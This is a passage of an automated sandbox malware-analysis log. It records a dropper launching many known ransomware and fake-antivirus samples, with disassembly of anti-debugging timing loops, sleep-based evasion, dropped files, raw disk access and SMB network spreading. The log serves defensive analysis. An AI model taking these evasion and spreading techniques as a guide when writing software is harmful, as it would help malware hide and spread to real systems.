        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000406423 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004065CC instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000421A1F instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000421BD2 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000421D80 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004222EE instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000408583 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000427F61 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000407F6E instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000427E90 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000406423 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004065CC instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004079F8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000420BFA instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000407369 instructions caused by: Self-modifying code
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeSpecial instruction interceptor: First address: 0000000000408583 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004234FE instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004227E7 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000423807 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004229A1 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000422B43 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000422D12 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000422FA8 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000423341 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000422EA0 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004236A5 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000403FC6 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000403E5C instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 000000000042A9D8 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB8EA58F5h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007F5CB83BFA41h 0x0000001d jmp 00007F5CB83BFBE5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429FC1 second address: 0000000000429FC1 instructions: 0x00000000 rdtsc 0x00000002 xor eax, ebx 0x00000004 mov ecx, eax 0x00000006 rol eax, cl 0x00000008 pop ebx 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d ret 0x0000000e push edx 0x0000000f mov ebx, 00000800h 0x00000014 call 00007F5CB8EA5AE8h 0x00000019 push ebx 0x0000001a rdtsc
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429E29 second address: 0000000000429E0C instructions: 0x00000000 rdtsc 0x00000002 xor eax, ebx 0x00000004 xor edx, edx 0x00000006 mov ebx, 00000100h 0x0000000b div ebx 0x0000000d mov byte ptr [esi], dl 0x0000000f inc dword ptr [esp+08h] 0x00000013 inc dword ptr [esp] 0x00000016 inc dword ptr [esp+04h] 0x0000001a cmp dword ptr [esp+04h], 18h 0x0000001f jne 00007F5CB83BFAE9h 0x00000021 cmp dword ptr [esp+08h], 08h 0x00000026 jne 00007F5CB83BFB96h 0x00000028 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429E58 second address: 0000000000429E58 instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 xor eax, ebx 0x00000006 mov ebx, 00000100h 0x0000000b div ebx 0x0000000d mov byte ptr [esi], dl 0x0000000f inc esi 0x00000010 inc ecx 0x00000011 cmp ecx, dword ptr [ebp-2Ch] 0x00000014 jne 00007F5CB8EA585Ch 0x00000016 rdtsc
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB8EA58F5h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007F5CB83BFA41h 0x0000001d jmp 00007F5CB83BFBE5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeRDTSC instruction interceptor: First address: 0000000000420882 second address: 0000000000425771 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 mov ebx, 00002328h 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d mov eax, 00001770h 0x00000012 add eax, edx 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 push eax 0x00000018 push 00000013h 0x0000001a call dword ptr [ebp+08h] 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 sub esp, 08h 0x00000023 rdtsc
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB8EA58F5h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F5CB83BFBE5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007F5CB83BFA41h 0x0000001d jmp 00007F5CB83BFBE5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeRDTSC instruction interceptor: First address: 0000000000420882 second address: 0000000000425771 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 mov ebx, 00002328h 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d mov eax, 00001770h 0x00000012 add eax, edx 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 push eax 0x00000018 push 00000013h 0x0000001a call dword ptr [ebp+08h] 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 sub esp, 08h 0x00000023 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcess
        Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exe TID: 5968Thread sleep count: 42 > 30Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exe TID: 5968Thread sleep time: -42000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe TID: 5596Thread sleep time: -50000s >= -30000s
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiAB02.tmpJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\cscc.datJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dllJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,12_2_04777D4E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,12_2_04778B2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,12_2_04778D39
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeThread delayed: delay time: 50000
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeAPI call chain: ExitProcess graph end nodegraph_11-13008
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
        Source: svchost.exe, 00000001.00000002.527323267.000001E529A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
        Source: rundll32.exe, 0000000C.00000002.347710374.0000000004B01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344233201.000000000305B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 00000001.00000002.541045221.000001E529A3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
        Source: svchost.exe, 00000003.00000002.561499289.0000026EC7867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.555786663.000001ECF1429000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.365290911.000000000178A000.00000004.00000020.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000002.603094292.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, Endermanch@NoMoreRansom.exe, 00000027.00000002.621241619.00000000009AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: LOAcQQUU.exe, 0000003C.00000002.561745110.000000000076A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
        Source: C:\Windows\EF39.tmpProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,12_2_04775A73
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004048F8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,11_2_004048F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,12_2_04775E9F
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,12_2_04779016
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D10C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,9_2_000D10C0
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess token adjusted: Debug
        Source: C:\Windows\EF39.tmpProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D1499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,9_2_000D1499

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 178.79.242.0 445Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeFile queried: C:\WINDOWS\Cursors\avp.exe
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe" Jump to behavior
